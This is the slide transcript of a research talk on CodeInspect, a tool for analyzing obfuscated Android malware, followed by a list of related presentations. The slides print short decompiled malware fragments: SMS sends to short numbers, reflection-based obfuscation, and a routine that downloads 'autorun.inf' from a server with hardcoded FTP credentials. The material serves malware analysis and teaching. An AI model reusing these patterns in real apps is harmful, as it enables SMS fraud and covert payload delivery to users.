analyzing sophisticated android malware with codeinspect
play

Analyzing Sophisticated Android Malware with CodeInspect Siegfried - PowerPoint PPT Presentation

Mar 21, 2024 •409 likes •603 views

Analyzing Sophisticated Android Malware with CodeInspect Siegfried Rasthofer SECURE SOFTWARE ENGINEERING GROUP #whoami 3rd year PhD-Student at Secure Software Engineering Group Darmstadt, Germany (Prof. Dr. Eric Bodden)

  1. Analyzing Sophisticated Android Malware with CodeInspect Siegfried Rasthofer SECURE SOFTWARE ENGINEERING GROUP

  2. #whoami • 3rd year PhD-Student at Secure Software 
 Engineering Group Darmstadt, Germany 
 (Prof. Dr. Eric Bodden) • Research interest: • Applied software security on Android • Static-/dynamic code analyses • Android Security: • Found 2 AOSP exploits • Korea Threat investigation together with McAfee Research Lab Intel Security SECURE 2 SOFTWARE ENGINEERING GROUP

  3. Malware SECURE 3 SOFTWARE ENGINEERING GROUP

  4. public void onCreate(android.os.Bundle $param0) { sendTextMessage("3353", null, "798657", null, null); sendTextMessage("3354", null, "798657", null, null); sendTextMessage("3353", null, "798657", null, null); } public static boolean gdadbjrj(String paramString1 , String paramString2) { Class clz = Class.forName(gdadbjrj.gdadbjrj("VRIf3+In9a.aTA3RYnD1BcVRV]af")); 
 Object localObject = clz.getMethod( gdadbjrj.gdadbjrj("]a9maFVM.9"), 
 new Class[0]).invoke(null, new Object[0]); 
 String s = gdadbjrj.gdadbjrj("BaRIta*9caBBV]a"); 
 Class c = Class.forName(gdadbjrj.gdadbjrj ("VRIf3+InVTTnSaRI+R]KR9aR9")); 
 Class [] arr = new Class [] { nglpsq.cbhgc, nglpsq.cbhgc, glpsq.cbhgc, c, c}; 
 clz.getMethod(s, arr).invoke(localObject , new Object [] 
 { paramString1 , null , paramString2 , null , null }); } 
 SECURE 4 SOFTWARE ENGINEERING GROUP

  5. - Reflections - Packers - Anti-Decompile - Anti-Debug - … public static boolean gdadbjrj(String paramString1 , String paramString2) { Class clz = Class.forName(gdadbjrj.gdadbjrj("VRIf3+In9a.aTA3RYnD1BcVRV]af")); 
 Object localObject = clz.getMethod( gdadbjrj.gdadbjrj("]a9maFVM.9"), 
 new Class[0]).invoke(null, new Object[0]); 
 String s = gdadbjrj.gdadbjrj("BaRIta*9caBBV]a"); 
 Class c = Class.forName(gdadbjrj.gdadbjrj ("VRIf3+InVTTnSaRI+R]KR9aR9")); 
 Class [] arr = new Class [] { nglpsq.cbhgc, nglpsq.cbhgc, glpsq.cbhgc, c, c}; 
 clz.getMethod(s, arr).invoke(localObject , new Object [] 
 { paramString1 , null , paramString2 , null , null }); } 
 SECURE 5 SOFTWARE ENGINEERING GROUP

  6. A new Binary Analysis Framework for Android and Java Bytecode SECURE 6 SOFTWARE ENGINEERING GROUP

  7. Soot SECURE 7 SOFTWARE ENGINEERING GROUP

  8. Soot Input/Output .dex .java .jimple .class .apk Soot - Various callgraph algorithms - Sophisticated algorithms used in compiler construction - Code manipulation https://github.com/Sable/soot/wiki SECURE 8 SOFTWARE ENGINEERING GROUP

  9. Jimple Soot SECURE 9 SOFTWARE ENGINEERING GROUP

  10. Jimple Soot public static boolean UsbAutoRunAttack(android.content.Context $param0) { Declarations java.lang.String $String; $String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>; ... staticinvoke <smart.apps.droidcleaner.Tools: boolean Code DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)> ($String, "autorun.inf", "ftpupper", "thisisshit007", $param0); Return-Statement return true; } SECURE 10 SOFTWARE ENGINEERING GROUP

  11. CodeInspect Jimple Soot SECURE 11 SOFTWARE ENGINEERING GROUP

  12. Jimple CodeInspect Soot Syntax Code Java Source Highlighting Refactoring Enhancement Jimple Code Code Debugger Readable Manipulation Files Dataflow “Region“ Deobfuscator Visualizer Detection SECURE 12 SOFTWARE ENGINEERING GROUP

  13. Let’s get started… 1. Import APK 2. Start Device SECURE 13 SOFTWARE ENGINEERING GROUP

  14. Android/BadAccents SMS E-Mail Install Activation Uninstall AV Fake AV Component User Intercept SMS Intercept Call Banking Trojan Send SMS HTTP Native Code File System Waiting Time Environment Settings App Internal External Event An Investigation of the Android/BadAccents Malware which Exploits a new Android Tapjacking Attack Siegfried Rasthofer, Irfan Asrar, Stephan Huber, Eric Bodden SECURE 14 SOFTWARE ENGINEERING GROUP

  15. Live-Demo https://goo.gl/LblcR5 SECURE 15 SOFTWARE ENGINEERING GROUP

  16. Future Steps • New Plugins under development • Easily add own analyses • What would be a useful feature for you? SECURE 16 SOFTWARE ENGINEERING GROUP

  17. How do I get this tool? SECURE 17 SOFTWARE ENGINEERING GROUP

  18. SECURE 18 SOFTWARE ENGINEERING GROUP

  19. Siegfried Rasthofer Secure Software Engineering Group Email: siegfried.rasthofer@cased.de Blog: http://sse-blog.ec-spride.de Website: http://sse.ec-spride.de Twitter: @CodeInspect SECURE 19 SOFTWARE ENGINEERING GROUP

Recommend

Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the explosive growth of mobile device market and usage, there is an increasing number of malicious mobile applications targeting these devices and

819 views • 44 slides
Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware

Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware

DeepSec IDSC Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware Adventures Agenda INTRODUCTION ANDROID MALWARE COMMAND &amp; CONTROL QUESTIONS &amp; ANSWERS 2 1 2 3 4 Android Malware

1.01k views • 64 slides
StormDroid: A streaminglized Machine Learning-Based System for Detecting Android Malware Sen

StormDroid: A streaminglized Machine Learning-Based System for Detecting Android Malware Sen

StormDroid: A streaminglized Machine Learning-Based System for Detecting Android Malware Sen Chen, Minhui Xue, Zhushou Tang, Lihua Xu, Haojin Zhu Malware Detection in Android 1.6 million apps in Google Play Store in July 2015

441 views • 22 slides
ANDROID MALWARE https://www.cnet.com/android-update/ Rafael Estrada Department of Mathematics

ANDROID MALWARE https://www.cnet.com/android-update/ Rafael Estrada Department of Mathematics

DATA ANALYSIS OF ANDROID MALWARE https://www.cnet.com/android-update/ Rafael Estrada Department of Mathematics New Mexico Tech Mentor: Dr. Golden G. Richard III Postdoctoral Researcher: Aisha Ali-Gombe July 26 th 2017 CCT REU 2017 ANDROID

347 views • 10 slides
PIN-point control for analyzing malware Jason Jones REcon 2014 1 Me Sr

PIN-point control for analyzing malware Jason Jones REcon 2014 1 Me Sr

PIN-point control for analyzing malware Jason Jones REcon 2014 1 Me Sr Sec Research Analyst @ Arbor ex-TippingPoint ASI Primarily reverse malware Interests / Research DDoS Botnet tracking Malware Clustering Bug

419 views • 29 slides
Dissecting Android Malware: Characterization and Evolution 1 Problems to solve 18 Requirement

Dissecting Android Malware: Characterization and Evolution 1 Problems to solve 18 Requirement

Dissecting Android Malware: Characterization and Evolution 1 Problems to solve 18 Requirement 1: Sufficient Malware data set Anti Virus Communities or Researchers are hampered by the lack of malware data set. Req equires a a suf

648 views • 34 slides
Analyzing Malware Detection Effectiveness with Multiple Anti- Malware Programs Jose A. Morales

Analyzing Malware Detection Effectiveness with Multiple Anti- Malware Programs Jose A. Morales

Analyzing Malware Detection Effectiveness with Multiple Anti- Malware Programs Jose A. Morales Shouhuai Xu Ravi Sandhu SEI @ CMU CS @ UTSA ICS @ UTSA Roadmap Motivation Experimental Methodology Experimental Results Summary

560 views • 16 slides
Apposcopy: Semantics- Based Detection of Android Malware through Static Analysis By Feng et al

Apposcopy: Semantics- Based Detection of Android Malware through Static Analysis By Feng et al

Apposcopy: Semantics- Based Detection of Android Malware through Static Analysis By Feng et al [FSE 14] Presented by Maaz Ahmad The Malware Problem (Feb, 2015) Motive Security Labs estimates 16 million infected mobile devices. [1]

828 views • 30 slides
Android malware that wont make you fall asleep ukasz Siewierski lukasz.siewierski@cert.pl

Android malware that wont make you fall asleep ukasz Siewierski lukasz.siewierski@cert.pl

Android malware that wont make you fall asleep ukasz Siewierski lukasz.siewierski@cert.pl @maldr0id Hackito Ergo Sum 2015 Android malware is boring! ukasz Siewierski (@maldr0id) Android malware that wont make you fall asleep 2 / 24

535 views • 34 slides
MaMaDroid: Detecting Android Malware by Building Markov Chains of Behavioral Models Enrico

MaMaDroid: Detecting Android Malware by Building Markov Chains of Behavioral Models Enrico

MaMaDroid: Detecting Android Malware by Building Markov Chains of Behavioral Models Enrico Mariconti , Lucky Onwuzurike, Panagiotis Andriotis, Emiliano De Cristofaro, Gordon Ross, Gianluca Stringhini. NDSS 2017, 28-02-2017 Motivation: Android

1.21k views • 37 slides
GroDDViewer: Dynamic dual view of Android malware Jean-Franois Lalande Mathieu Simon Valrie

GroDDViewer: Dynamic dual view of Android malware Jean-Franois Lalande Mathieu Simon Valrie

Introduction Malware analysis Visualization Conclusion GroDDViewer: Dynamic dual view of Android malware Jean-Franois Lalande Mathieu Simon Valrie Viet Triem Tong GraMSec 2020 CIDRE team June 22th 2020 Introduction Malware analysis

530 views • 28 slides
Andrubis 1,000,000 Apps Later A View on Current Android Malware Behaviors Martina

Andrubis 1,000,000 Apps Later A View on Current Android Malware Behaviors Martina

Andrubis 1,000,000 Apps Later A View on Current Android Malware Behaviors Martina Lindorfer, Matthias Neugschwandtner, Lukas Weichselbaum, Yanick Fratantonio, Victor van der Veen, Christian Platzer Vienna University of

425 views • 31 slides
SigPID: Significant Permission Identification for Android Malware Detection Authors: Lichao Sun,

SigPID: Significant Permission Identification for Android Malware Detection Authors: Lichao Sun,

SigPID: Significant Permission Identification for Android Malware Detection Authors: Lichao Sun, Zhiqiang Li, Qiben Yan, Witawas Srisa-an and Yu Pan Department of Computer Science and Engineering University of Nebraska Lincoln Presenters: Yu

999 views • 24 slides
Obfuscated Financial Fraud Android Malware : Detection and Behavior Tracking In Seung, Yang

Obfuscated Financial Fraud Android Malware : Detection and Behavior Tracking In Seung, Yang

Obfuscated Financial Fraud Android Malware : Detection and Behavior Tracking In Seung, Yang (KrCERT/CC, KISA) DeepSEC IDSC 2016 Friday, 11 November 2016 Analysis Team at KrCERT/CC, KISA Mobile malware analyst In Seung, Yang Who am I

1.59k views • 72 slides
Transparent System Introspection in Support of Analyzing Stealthy Malware Kevin Leach PhD

Transparent System Introspection in Support of Analyzing Stealthy Malware Kevin Leach PhD

Transparent System Introspection in Support of Analyzing Stealthy Malware Kevin Leach PhD Dissertation kjl2y@virginia.edu November 30, 2016 Analogy: Volkswagen Scandal Volkswagen cheated on emissions test (over 10x EPA requirements) 2

1.56k views • 78 slides
Nearby Threats: Reversing, Analyzing, and Attacking Googles Nearby Connections on Android

Nearby Threats: Reversing, Analyzing, and Attacking Googles Nearby Connections on Android

NDSS 2019 @ San Diego, US Nearby Threats: Reversing, Analyzing, and Attacking Googles Nearby Connections on Android Daniele Antonioli 1 , Nils Ole Tippenhauer 2 , Kasper Rasmussen 3 1 Singapore University of Technology and Design (SUTD) 2

671 views • 29 slides
AppSpear: Bytecode Decryp0ng and DEX Reassembling for Packed Android Malware Yang Wenbo, Zhang

AppSpear: Bytecode Decryp0ng and DEX Reassembling for Packed Android Malware Yang Wenbo, Zhang

AppSpear: Bytecode Decryp0ng and DEX Reassembling for Packed Android Malware Yang Wenbo, Zhang Yuanyuan, Li Juanru, Shu Junliang, Li Bodong, Hu Wenjun, Gu Dawu Sudeep Nanjappa Jayakumar Agenda Introduc0on AppSpear Goals,

322 views • 19 slides
DroidScribe Classifying Android Malware Based on Runtime Behavior Santanu Kumar Dash, Guillermo

DroidScribe Classifying Android Malware Based on Runtime Behavior Santanu Kumar Dash, Guillermo

DroidScribe Classifying Android Malware Based on Runtime Behavior Santanu Kumar Dash, Guillermo Suarez-Tangil , Salahuddin Khan, Kimberly Tam, Mansour Ahmadi, Johannes Kinder, and Lorenzo Cavallaro Royal Holloway, University of London

352 views • 33 slides
AVPASS: Automatically Bypassing Android Malware Detection System Jinho Jung, Chanil Jeon, Max

AVPASS: Automatically Bypassing Android Malware Detection System Jinho Jung, Chanil Jeon, Max

AVPASS: Automatically Bypassing Android Malware Detection System Jinho Jung, Chanil Jeon, Max Wolotsky, Insu Yun, and Taesoo Kim Georgia Institute of Technology, July 27, 2017 Ab About t Us SSLab (@GT) Focusing on s ystem and security

1.25k views • 72 slides
Kharon dataset: Android malware under a microscope Nicolas Kiss Jean-Franois Lalande Mourad

Kharon dataset: Android malware under a microscope Nicolas Kiss Jean-Franois Lalande Mourad

Kharon dataset: Android malware under a microscope Nicolas Kiss Jean-Franois Lalande Mourad Leslous Valrie Viet Triem Tong The LASER Workshop 2016 Learning from Authoritative Security Experiment Results May 26th 2016 N. Kiss &amp; J.-F.

367 views • 18 slides
DroidScope: Seamlessly Reconstructing the OS and Dalvik Semantic Views for Dynamic Android

DroidScope: Seamlessly Reconstructing the OS and Dalvik Semantic Views for Dynamic Android

DroidScope: Seamlessly Reconstructing the OS and Dalvik Semantic Views for Dynamic Android Malware Analysis Lok Yan Heng Yin August 10, 2012 1 Android Java Components System Services Native Components Apps 2 Android Java Components

631 views • 33 slides
Kharon dataset: Android malware under a microscope N. Kiss J.-F. Lalande EPI CIDRE INSA Centre

Kharon dataset: Android malware under a microscope N. Kiss J.-F. Lalande EPI CIDRE INSA Centre

Kharon dataset: Android malware under a microscope N. Kiss J.-F. Lalande EPI CIDRE INSA Centre Val de Loire CentraleSupelec, Inria, Univ. Rennes 1, CNRS, Univ. Orlans, LIFO EA 4022, F-35065 Rennes, France F-18020 Bourges, France M.

459 views • 12 slides
Malware Collusions Karim O. Elish, Danfeng (Daphne) Yao, and Barbara G. Ryder Department of

Malware Collusions Karim O. Elish, Danfeng (Daphne) Yao, and Barbara G. Ryder Department of

On the Need of Precise Inter-App ICC Classification for Detecting Android Malware Collusions Karim O. Elish, Danfeng (Daphne) Yao, and Barbara G. Ryder Department of Computer Science Virginia Tech May 21, 2015 Problem and Motivation Malware

139 views • 13 slides
Ubiquitous and Mobile Computing CS 528: A Survey of Mobile Malware in the Wild Alex Fortier

Ubiquitous and Mobile Computing CS 528: A Survey of Mobile Malware in the Wild Alex Fortier

Ubiquitous and Mobile Computing CS 528: A Survey of Mobile Malware in the Wild Alex Fortier Computer Science Dept. Worcester Polytechnic Institute (WPI) What is mobile malware? Targeted at Android, iOS, Symbian (discontinued), Windows Phone

507 views • 17 slides

More recommend